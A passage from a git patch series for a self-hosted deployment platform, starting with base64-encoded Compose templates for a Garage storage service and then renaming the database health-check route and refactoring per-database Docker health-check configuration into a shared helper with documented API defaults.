AgICAgcmV0cmllczogNQo=",
+        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF8zMl9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAgICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=",
         "tags": [
             "object",
             "storage",

From 5b0be9798ed0776e8d147445fa9d0c01b4daa283 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 06:55:30 +0200
Subject: [PATCH 56/90] chore(database): rename health checks route to
 healthcheck

---
 .../views/livewire/project/database/configuration.blade.php   | 4 ++--
 resources/views/livewire/project/database/health.blade.php    | 2 +-
 routes/web.php                                                | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/resources/views/livewire/project/database/configuration.blade.php b/resources/views/livewire/project/database/configuration.blade.php
index c58232200..d6aac7f30 100644
--- a/resources/views/livewire/project/database/configuration.blade.php
+++ b/resources/views/livewire/project/database/configuration.blade.php
@@ -16,7 +16,7 @@
             <a class='sub-menu-item' {{ wireNavigate() }} wire:current.exact="menu-item-active"
                 href="{{ route('project.database.persistent-storage', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Persistent Storage</span></a>
             <a class='sub-menu-item' {{ wireNavigate() }} wire:current.exact="menu-item-active"
-                href="{{ route('project.database.health-checks', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Health Checks</span></a>
+                href="{{ route('project.database.healthcheck', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Healthcheck</span></a>
             @can('update', $database)
                 <a class='sub-menu-item' wire:current.exact="menu-item-active"
                     href="{{ route('project.database.import-backup', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Import Backup</span></a>
@@ -59,7 +59,7 @@
                 <livewire:project.shared.destination :resource="$database" />
             @elseif ($currentRoute === 'project.database.persistent-storage')
                 <livewire:project.service.storage :resource="$database" />
-            @elseif ($currentRoute === 'project.database.health-checks')
+            @elseif ($currentRoute === 'project.database.healthcheck')
                 <livewire:project.database.health :database="$database" />
             @elseif ($currentRoute === 'project.database.import-backup')
                 <livewire:project.database.import :resource="$database" />
diff --git a/resources/views/livewire/project/database/health.blade.php b/resources/views/livewire/project/database/health.blade.php
index 2e70f79b2..d869defc1 100644
--- a/resources/views/livewire/project/database/health.blade.php
+++ b/resources/views/livewire/project/database/health.blade.php
@@ -1,6 +1,6 @@
 <form wire:submit='submit' class="flex flex-col">
     <div class="flex items-center gap-2">
-        <h2>Health Checks</h2>
+        <h2>Healthcheck</h2>
         <x-forms.button canGate="update" :canResource="$database" type="submit">Save</x-forms.button>
     </div>
     <div class="mt-1 pb-4">Configure how Docker checks this database's health. A higher interval lowers
diff --git a/routes/web.php b/routes/web.php
index e4d6f477f..19fb3b0db 100644
--- a/routes/web.php
+++ b/routes/web.php
@@ -243,7 +243,7 @@
         Route::get('/servers', DatabaseConfiguration::class)->name('project.database.servers');
         Route::get('/import-backup', DatabaseConfiguration::class)->name('project.database.import-backup')->middleware('can.update.resource');
         Route::get('/persistent-storage', DatabaseConfiguration::class)->name('project.database.persistent-storage');
-        Route::get('/health-checks', DatabaseConfiguration::class)->name('project.database.health-checks');
+        Route::get('/healthcheck', DatabaseConfiguration::class)->name('project.database.healthcheck');
         Route::get('/webhooks', DatabaseConfiguration::class)->name('project.database.webhooks');
         Route::get('/resource-limits', DatabaseConfiguration::class)->name('project.database.resource-limits');
         Route::get('/resource-operations', DatabaseConfiguration::class)->name('project.database.resource-operations');

From 51062e73a6f92695e3f3b51f5886171e70d85fb7 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Mon, 1 Jun 2026 08:55:03 +0200
Subject: [PATCH 57/90] fix(database): honor disabled standalone health checks

Skip Docker healthcheck configuration when standalone database health checks are disabled, and document default health check settings in the database API schema.
---
 app/Actions/Database/StartClickhouse.php      |  10 +-
 app/Actions/Database/StartDragonfly.php       |  10 +-
 app/Actions/Database/StartKeydb.php           |  10 +-
 app/Actions/Database/StartMariadb.php         |  10 +-
 app/Actions/Database/StartMongodb.php         |  16 +--
 app/Actions/Database/StartMysql.php           |  10 +-
 app/Actions/Database/StartPostgresql.php      |  10 +-
 app/Actions/Database/StartRedis.php           |  16 +--
 .../Controllers/Api/DatabasesController.php   |  10 +-
 app/Livewire/Project/Database/Health.php      |  58 ++++++--
 app/Models/StandaloneClickhouse.php           |   2 +-
 app/Models/StandaloneDragonfly.php            |   2 +-
 app/Models/StandaloneKeydb.php                |   2 +-
 app/Models/StandaloneMariadb.php              |   2 +-
 app/Models/StandaloneMongodb.php              |   2 +-
 app/Models/StandaloneMysql.php                |   2 +-
 app/Models/StandalonePostgresql.php           |   2 +-
 app/Models/StandaloneRedis.php                |   2 +-
 app/Traits/HasDatabaseHealthCheck.php         |  11 ++
 openapi.json                                  |  19 ++-
 openapi.yaml                                  |   9 ++
 .../project/database/configuration.blade.php  |   4 +-
 .../project/database/health.blade.php         |  47 ++++---
 .../project/shared/health-checks.blade.php    |   2 +-
 tests/Feature/DatabaseHealthCheckTest.php     | 130 ++++++++++++++++++
 25 files changed, 283 insertions(+), 115 deletions(-)

diff --git a/app/Actions/Database/StartClickhouse.php b/app/Actions/Database/StartClickhouse.php
index 1128b8f8f..525e736c3 100644
--- a/app/Actions/Database/StartClickhouse.php
+++ b/app/Actions/Database/StartClickhouse.php
@@ -50,13 +50,9 @@ public function handle(StandaloneClickhouse $database)
                         ],
                     ],
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
-                    'healthcheck' => [
-                        'test' => ['CMD', 'clickhouse-client', '--user', (string) $this->database->clickhouse_admin_user, '--password', (string) $this->database->clickhouse_admin_password, '--query', 'SELECT 1'],
-                        'interval' => "{$this->database->health_check_interval}s",
-                        'timeout' => "{$this->database->health_check_timeout}s",
-                        'retries' => $this->database->health_check_retries,
-                        'start_period' => "{$this->database->health_check_start_period}s",
-                    ],
+                    'healthcheck' => $this->database->healthCheckConfiguration([
+                        'CMD', 'clickhouse-client', '--user', (string) $this->database->clickhouse_admin_user, '--password', (string) $this->database->clickhouse_admin_password, '--query', 'SELECT 1',
+                    ]),
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
                     'mem_swappiness' => $this->database->limits_memory_swappiness,
diff --git a/app/Actions/Database/StartDragonfly.php b/app/Actions/Database/StartDragonfly.php
index 530ba7d23..b78a0987d 100644
--- a/app/Actions/Database/StartDragonfly.php
+++ b/app/Actions/Database/StartDragonfly.php
@@ -106,13 +106,9 @@ public function handle(StandaloneDragonfly $database)
                         $this->database->destination->network,
                     ],
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
-                    'healthcheck' => [
-                        'test' => ['CMD', 'redis-cli', '-a', (string) $this->database->dragonfly_password, 'ping'],
-                        'interval' => "{$this->database->health_check_interval}s",
-                        'timeout' => "{$this->database->health_check_timeout}s",
-                        'retries' => $this->database->health_check_retries,
-                        'start_period' => "{$this->database->health_check_start_period}s",
-                    ],
+                    'healthcheck' => $this->database->healthCheckConfiguration([
+                        'CMD', 'redis-cli', '-a', (string) $this->database->dragonfly_password, 'ping',
+                    ]),
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
                     'mem_swappiness' => $this->database->limits_memory_swappiness,
diff --git a/app/Actions/Database/StartKeydb.php b/app/Actions/Database/StartKeydb.php
index e9acd0b3c..89258fe24 100644
--- a/app/Actions/Database/StartKeydb.php
+++ b/app/Actions/Database/StartKeydb.php
@@ -108,13 +108,9 @@ public function handle(StandaloneKeydb $database)
                         $this->database->destination->network,
                     ],
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
-                    'healthcheck' => [
-                        'test' => ['CMD', 'keydb-cli', '--pass', (string) $this->database->keydb_password, 'ping'],
-                        'interval' => "{$this->database->health_check_interval}s",
-                        'timeout' => "{$this->database->health_check_timeout}s",
-                        'retries' => $this->database->health_check_retries,
-                        'start_period' => "{$this->database->health_check_start_period}s",
-                    ],
+                    'healthcheck' => $this->database->healthCheckConfiguration([
+                        'CMD', 'keydb-cli', '--pass', (string) $this->database->keydb_password, 'ping',
+                    ]),
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
                     'mem_swappiness' => $this->database->limits_memory_swappiness,
diff --git a/app/Actions/Database/StartMariadb.php b/app/Actions/Database/StartMariadb.php
index 17ed2a9a8..2e8faea9a 100644
--- a/app/Actions/Database/StartMariadb.php
+++ b/app/Actions/Database/StartMariadb.php
@@ -103,13 +103,9 @@ public function handle(StandaloneMariadb $database)
                         $this->database->destination->network,
                     ],
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
-                    'healthcheck' => [
-                        'test' => ['CMD', 'healthcheck.sh', '--connect', '--innodb_initialized'],
-                        'interval' => "{$this->database->health_check_interval}s",
-                        'timeout' => "{$this->database->health_check_timeout}s",
-                        'retries' => $this->database->health_check_retries,
-                        'start_period' => "{$this->database->health_check_start_period}s",
-                    ],
+                    'healthcheck' => $this->database->healthCheckConfiguration([
+                        'CMD', 'healthcheck.sh', '--connect', '--innodb_initialized',
+                    ]),
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
                     'mem_swappiness' => $this->database->limits_memory_swappiness,
diff --git a/app/Actions/Database/StartMongodb.php b/app/Actions/Database/StartMongodb.php
index e5973e807..80ec812a1 100644
--- a/app/Actions/Database/StartMongodb.php
+++ b/app/Actions/Database/StartMongodb.php
@@ -109,17 +109,11 @@ public function handle(StandaloneMongodb $database)
                         $this->database->destination->network,
                     ],
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
-                    'healthcheck' => [
-                        'test' => [
-                            'CMD',
-                            'echo',
-                            'ok',
-                        ],
-                        'interval' => "{$this->database->health_check_interval}s",
-                        'timeout' => "{$this->database->health_check_timeout}s",
-                        'retries' => $this->database->health_check_retries,
-                        'start_period' => "{$this->database->health_check_start_period}s",
-                    ],
+                    'healthcheck' => $this->database->healthCheckConfiguration([
+                        'CMD',
+                        'echo',
+                        'ok',
+                    ]),
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
                     'mem_swappiness' => $this->database->limits_memory_swappiness,
diff --git a/app/Actions/Database/StartMysql.php b/app/Actions/Database/StartMysql.php
index f9d75e0c8..0445bddcd 100644
--- a/app/Actions/Database/StartMysql.php
+++ b/app/Actions/Database/StartMysql.php
@@ -103,13 +103,9 @@ public function handle(StandaloneMysql $database)
                         $this->database->destination->network,
                     ],
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
-                    'healthcheck' => [
-                        'test' => ['CMD', 'mysqladmin', 'ping', '-h', 'localhost', '-u', 'root', "-p{$this->database->mysql_root_password}"],
-                        'interval' => "{$this->database->health_check_interval}s",
-                        'timeout' => "{$this->database->health_check_timeout}s",
-                        'retries' => $this->database->health_check_retries,
-                        'start_period' => "{$this->database->health_check_start_period}s",
-                    ],
+                    'healthcheck' => $this->database->healthCheckConfiguration([
+                        'CMD', 'mysqladmin', 'ping', '-h', 'localhost', '-u', 'root', "-p{$this->database->mysql_root_password}",
+                    ]),
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
                     'mem_swappiness' => $this->database->limits_memory_swappiness,
diff --git a/app/Actions/Database/StartPostgresql.php b/app/Actions/Database/StartPostgresql.php
index 520cbdec4..ae7ae9860 100644
--- a/app/Actions/Database/StartPostgresql.php
+++ b/app/Actions/Database/StartPostgresql.php
@@ -110,13 +110,9 @@ public function handle(StandalonePostgresql $database)
                         $this->database->destination->network,
                     ],
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
-                    'healthcheck' => [
-                        'test' => ['CMD', 'psql', '-U', (string) $this->database->postgres_user, '-d', (string) $this->database->postgres_db, '-c', 'SELECT 1'],
-                        'interval' => "{$this->database->health_check_interval}s",
-                        'timeout' => "{$this->database->health_check_timeout}s",
-                        'retries' => $this->database->health_check_retries,
-                        'start_period' => "{$this->database->health_check_start_period}s",
-                    ],
+                    'healthcheck' => $this->database->healthCheckConfiguration([
+                        'CMD', 'psql', '-U', (string) $this->database->postgres_user, '-d', (string) $this->database->postgres_db, '-c', 'SELECT 1',
+                    ]),
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
                     'mem_swappiness' => $this->database->limits_memory_swappiness,
diff --git a/app/Actions/Database/StartRedis.php b/app/Actions/Database/StartRedis.php
index e4bfd98e1..64b434821 100644
--- a/app/Actions/Database/StartRedis.php
+++ b/app/Actions/Database/StartRedis.php
@@ -105,17 +105,11 @@ public function handle(StandaloneRedis $database)
                         $this->database->destination->network,
                     ],
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
-                    'healthcheck' => [
-                        'test' => [
-                            'CMD-SHELL',
-                            'redis-cli',
-                            'ping',
-                        ],
-                        'interval' => "{$this->database->health_check_interval}s",
-                        'timeout' => "{$this->database->health_check_timeout}s",
-                        'retries' => $this->database->health_check_retries,
-                        'start_period' => "{$this->database->health_check_start_period}s",
-                    ],
+                    'healthcheck' => $this->database->healthCheckConfiguration([
+                        'CMD-SHELL',
+                        'redis-cli',
+                        'ping',
+                    ]),
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
                     'mem_swappiness' => $this->database->limits_memory_swappiness,
diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index e2d2aad92..bceef4d39 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -299,11 +299,11 @@ public function database_by_uuid(Request $request)
                         'mysql_user' => ['type' => 'string', 'description' => 'MySQL user'],
                         'mysql_database' => ['type' => 'string', 'description' => 'MySQL database'],
                         'mysql_conf' => ['type' => 'string', 'description' => 'MySQL conf'],
-                        'health_check_enabled' => ['type' => 'boolean', 'description' => 'Enable the database healthcheck probe.'],
-                        'health_check_interval' => ['type' => 'integer', 'description' => 'Healthcheck interval in seconds.'],
-                        'health_check_timeout' => ['type' => 'integer', 'description' => 'Healthcheck timeout in seconds.'],
-                        'health_check_retries' => ['type' => 'integer', 'description' => 'Healthcheck retries count.'],
-                        'health_check_start_period' => ['type' => 'integer', 'description' => 'Healthcheck start period in seconds.'],
+                        'health_check_enabled' => ['type' => 'boolean', 'description' => 'Enable the database healthcheck probe.', 'default' => true],
+                        'health_check_interval' => ['type' => 'integer', 'description' => 'Healthcheck interval in seconds.', 'minimum' => 1, 'default' => 15],
+                        'health_check_timeout' => ['type' => 'integer', 'description' => 'Healthcheck timeout in seconds.', 'minimum' => 1, 'default' => 5],
+                        'health_check_retries' => ['type' => 'integer', 'description' => 'Healthcheck retries count.', 'minimum' => 1, 'default' => 5],
+                        'health_check_start_period' => ['type' => 'integer', 'description' => 'Healthcheck start period in seconds.', 'minimum' => 0, 'default' => 5],
                     ],
                 ),
             )
diff --git a/app/Livewire/Project/Database/Health.php b/app/Livewire/Project/Database/Health.php
index 33540d74e..535e73689 100644
--- a/app/Livewire/Project/Database/Health.php
+++ b/app/Livewire/Project/Database/Health.php
@@ -2,6 +2,7 @@
 
 namespace App\Livewire\Project\Database;
 
+use Illuminate\Contracts\View\View;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Attributes\Validate;
 use Livewire\Component;
@@ -27,7 +28,7 @@ class Health extends Component
     #[Validate(['integer', 'min:0'])]
     public int $healthCheckStartPeriod = 5;
 
-    public function mount()
+    public function mount(): void
     {
         $this->authorize('view', $this->database);
         $this->syncData();
@@ -52,29 +53,64 @@ public function syncData(bool $toModel = false): void
         }
     }
 
-    public function instantSave()
+    public function instantSave(): void
     {
         $this->submit();
     }
 
-    public function submit()
+    public function submit(): void
     {
+        $updateSuccessful = false;
+
         try {
             $this->authorize('update', $this->database);
             $this->syncData(true);
+            $updateSuccessful = true;
             $this->dispatch('success', 'Health check updated. Restart the database to apply the changes.');
         } catch (\Throwable $e) {
-            return handleError($e, $this);
-        } finally {
-            if (is_null($this->database->config_hash)) {
-                $this->database->isConfigurationChanged(true);
-            } else {
-                $this->dispatch('configurationChanged');
-            }
+            handleError($e, $this);
         }
+
+        if (! $updateSuccessful) {
+            return;
+        }
+
+        $this->markConfigurationChanged();
     }
 
-    public function render()
+    public function toggleHealthcheck(): void
+    {
+        $updateSuccessful = false;
+
+        try {
+            $this->authorize('update', $this->database);
+            $this->healthCheckEnabled = ! $this->healthCheckEnabled;
+            $this->syncData(true);
+            $updateSuccessful = true;
+            $this->dispatch('success', 'Health check '.($this->healthCheckEnabled ? 'enabled' : 'disabled').'. Restart the database to apply the changes.');
+        } catch (\Throwable $e) {
+            handleError($e, $this);
+        }
+
+        if (! $updateSuccessful) {
+            return;
+        }
+
+        $this->markConfigurationChanged();
+    }
+
+    private function markConfigurationChanged(): void
+    {
+        if (is_null($this->database->config_hash)) {
+            $this->database->isConfigurationChanged(true);
+
+            return;
+        }
+
+        $this->dispatch('configurationChanged');
+    }
+
+    public function render(): View
     {
         return view('livewire.project.database.health');
     }
diff --git a/app/Models/StandaloneClickhouse.php b/app/Models/StandaloneClickhouse.php
index 1e68046f9..b104be642 100644
--- a/app/Models/StandaloneClickhouse.php
+++ b/app/Models/StandaloneClickhouse.php
@@ -122,7 +122,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings;
-        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
+        $newConfigHash .= $this->healthCheckConfigurationHash();
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandaloneDragonfly.php b/app/Models/StandaloneDragonfly.php
index 5f76be884..2232ec772 100644
--- a/app/Models/StandaloneDragonfly.php
+++ b/app/Models/StandaloneDragonfly.php
@@ -121,7 +121,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings;
-        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
+        $newConfigHash .= $this->healthCheckConfigurationHash();
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandaloneKeydb.php b/app/Models/StandaloneKeydb.php
index 6d3b5a82b..b9f9f765b 100644
--- a/app/Models/StandaloneKeydb.php
+++ b/app/Models/StandaloneKeydb.php
@@ -122,7 +122,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->keydb_conf;
-        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
+        $newConfigHash .= $this->healthCheckConfigurationHash();
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandaloneMariadb.php b/app/Models/StandaloneMariadb.php
index 1058d8721..cd94b6c9b 100644
--- a/app/Models/StandaloneMariadb.php
+++ b/app/Models/StandaloneMariadb.php
@@ -125,7 +125,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->mariadb_conf;
-        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
+        $newConfigHash .= $this->healthCheckConfigurationHash();
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandaloneMongodb.php b/app/Models/StandaloneMongodb.php
index 4657f1d5e..7d2ffbd74 100644
--- a/app/Models/StandaloneMongodb.php
+++ b/app/Models/StandaloneMongodb.php
@@ -131,7 +131,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->mongo_conf;
-        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
+        $newConfigHash .= $this->healthCheckConfigurationHash();
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandaloneMysql.php b/app/Models/StandaloneMysql.php
index f3d0ad55f..f752312d3 100644
--- a/app/Models/StandaloneMysql.php
+++ b/app/Models/StandaloneMysql.php
@@ -127,7 +127,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->mysql_conf;
-        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
+        $newConfigHash .= $this->healthCheckConfigurationHash();
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandalonePostgresql.php b/app/Models/StandalonePostgresql.php
index 39482892d..04d2291b3 100644
--- a/app/Models/StandalonePostgresql.php
+++ b/app/Models/StandalonePostgresql.php
@@ -169,7 +169,7 @@ public function deleteVolumes()
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->postgres_initdb_args.$this->postgres_host_auth_method;
-        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
+        $newConfigHash .= $this->healthCheckConfigurationHash();
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandaloneRedis.php b/app/Models/StandaloneRedis.php
index 3d1d11138..efb0254fb 100644
--- a/app/Models/StandaloneRedis.php
+++ b/app/Models/StandaloneRedis.php
@@ -126,7 +126,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->redis_conf;
-        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
+        $newConfigHash .= $this->healthCheckConfigurationHash();
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Traits/HasDatabaseHealthCheck.php b/app/Traits/HasDatabaseHealthCheck.php
index 2602ecb23..62ca345ed 100644
--- a/app/Traits/HasDatabaseHealthCheck.php
+++ b/app/Traits/HasDatabaseHealthCheck.php
@@ -31,4 +31,15 @@ public function healthCheckConfiguration(array $test): array
             'start_period' => ($this->health_check_start_period ?? 5).'s',
         ];
     }
+
+    protected function healthCheckConfigurationHash(): string
+    {
+        return implode('|', [
+            (int) ($this->health_check_enabled ?? true),
+            $this->health_check_interval ?? 15,
+            $this->health_check_timeout ?? 5,
+            $this->health_check_retries ?? 5,
+            $this->health_check_start_period ?? 5,
+        ]);
+    }
 }
diff --git a/openapi.json b/openapi.json
index d3d25bacc..f3bda9ab8 100644
--- a/openapi.json
+++ b/openapi.json
@@ -4608,23 +4608,32 @@
                                     },
                                     "health_check_enabled": {
                                         "type": "boolean",
-                                        "description": "Enable the database healthcheck probe."
+                                        "description": "Enable the database healthcheck probe.",
+                                        "default": true
                                     },
                                     "health_check_interval": {
                                         "type": "integer",
-                                        "description": "Healthcheck interval in seconds."
+                                        "description": "Healthcheck interval in seconds.",
+                                        "minimum": 1,
+                                        "default": 15
                                     },
                                     "health_check_timeout": {
                                         "type": "integer",
-                                        "description": "Healthcheck timeout in seconds."
+                                        "description": "Healthcheck timeout in seconds.",
+                                        "minimum": 1,
+                                        "default": 5
                                     },
                                     "health_check_retries": {
                                         "type": "integer",
-                                        "description": "Healthcheck retries count."
+                                        "description": "Healthcheck retries count.",
+                                        "minimum": 1,
+                                        "default": 5
                                     },
                                     "health_check_start_period": {
                                         "type": "integer",
-                                        "description": "Healthcheck start period in seconds."
+                                        "description": "Healthcheck start period in seconds.",
+                                        "minimum": 0,
+                                        "default": 5
                                     }
                                 },
                                 "type": "object"
diff --git a/openapi.yaml b/openapi.yaml
index 469a0c38d..fae8d7110 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2953,18 +2953,27 @@ paths:
                 health_check_enabled:
                   type: boolean
                   description: 'Enable the database healthcheck probe.'
+                  default: true
                 health_check_interval:
                   type: integer
                   description: 'Healthcheck interval in seconds.'
+                  minimum: 1
+                  default: 15
                 health_check_timeout:
                   type: integer
                   description: 'Healthcheck timeout in seconds.'
+                  minimum: 1
+                  default: 5
                 health_check_retries:
                   type: integer
                   description: 'Healthcheck retries count.'
+                  minimum: 1
+                  default: 5
                 health_check_start_period:
                   type: integer
                   description: 'Healthcheck start period in seconds.'
+                  minimum: 0
+                  default: 5
               type: object
       responses:
         '200':
diff --git a/resources/views/livewire/project/database/configuration.blade.php b/resources/views/livewire/project/database/configuration.blade.php
index d6aac7f30..6e2ac208b 100644
--- a/resources/views/livewire/project/database/configuration.blade.php
+++ b/resources/views/livewire/project/database/configuration.blade.php
@@ -15,14 +15,14 @@
                 href="{{ route('project.database.servers', ['project_uuid' => $project->uuid, 'environment_uuid' => $environment->uuid, 'database_uuid' => $database->uuid]) }}"><span class="menu-item-label">Servers</span></a>
